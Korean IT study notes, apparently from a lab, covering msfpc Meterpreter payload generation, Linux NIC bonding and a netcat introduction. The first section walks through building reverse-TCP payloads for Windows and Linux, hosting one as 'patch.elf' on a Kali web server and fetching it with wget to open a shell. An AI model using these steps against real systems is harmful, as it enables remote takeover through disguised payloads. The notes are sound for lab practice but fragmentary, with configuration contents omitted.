Study_IT

https://github.com/g0tmi1k/mpc            // msfpc github 사이트

// 자동 공격코드 생성 도구

kali# git clone https://github.com/g0tmi1k/mpc.git        // msfpc 다운로드

[Window]

- 윈도우용 공격코드 생성

- 생성된 실행파일을 /var/www/html/down에 test.exe라는 이름으로 저장

- 아파치 웹서버 실행-

- 윈도우에서 칼리 웹서버의 down 폴더에 접속 후 text.exe 다운로드

- 위의 코드 생성할때 run부분에 나온 코드를 실행

- 이후 윈도우에 받은 test.exe파일 실행

- meterpreter 프롬포트가 성공적으로 나오고 스크린샷 명령으로 성공 했는지 확인

[Linux]

- 리눅스용 공격 코드 생성

kali# cp /root/mpc/linux-shell-staged-reverse-tcp-60000.elf /var/www/html/down/patch.elf        // 생성된 실행 파일을 웹서버의 down 디렉터리로                                                                                                                                 patch.elf  라는 이름으로 복사

centos# wget http://100.100.100.1/down/patch.elf        // patch.elf 파일을 리눅스로 가져온다.

- 위 run에 있는 명령어로 실행

- 리눅스에서 patch.elf 실행

- 리눅스에 연결하야 ls 명령어로 리눅스의 홈 디렉터리 파일 목록을 확인

Bonding - 네트워크 이중화

1.NIC(네트워크 카드) 추가

- eth1로 새로운 네트워크 카드가 추가 되었다. 

#vi /etc/sysconfig/network-scripts/ifcfg-eth0

이 파일의 내용을 다음과 같이 바꿔준다.

#vi /etc/sysconfig/network-scripts/ifcfg-eth1

이 파일의 내용을 다음과 같이 바꿔준다.

#vi /etc/sysconfig/network-scripts/ifcfg-bond0

이 파일의 내용을 다음과 같이 바꿔준다.

- mode=1            // 활성화 되었있는 NIC에 문제 발생시 예비 NIC로 변경되는 기능

- miimon=100      //  모니터링 주기 (ms)  

#vi /etc/modprobe.d/bonding.conf            // 커널에 전달 본딩 설정을 저장하고 있는 파일

커널에 본딩 기능 추가

#modprobe bond0

#service network restart        // 네트워크 재시작

### Bonding 설정 확인 ### 

- bond0에 ip주소 , eth0, eth1에는 ip주소 X

이후 vmware에서 네트워크 카드 연결 해제 하며 테스트

NC ( Net Cat )

- 네트워크로 입력된 데이터를 사용하는 툴

- Cat 표준 입출력

- nc 네트워크 입출력

# yum -y install nc        // nc 설치

# service iptables stop    // 방화벽에서 nc의 포트를 차단하기 때문에 방화벽을 잠시 차단한다.

- 서버에서 2000번 포트로 nc 사용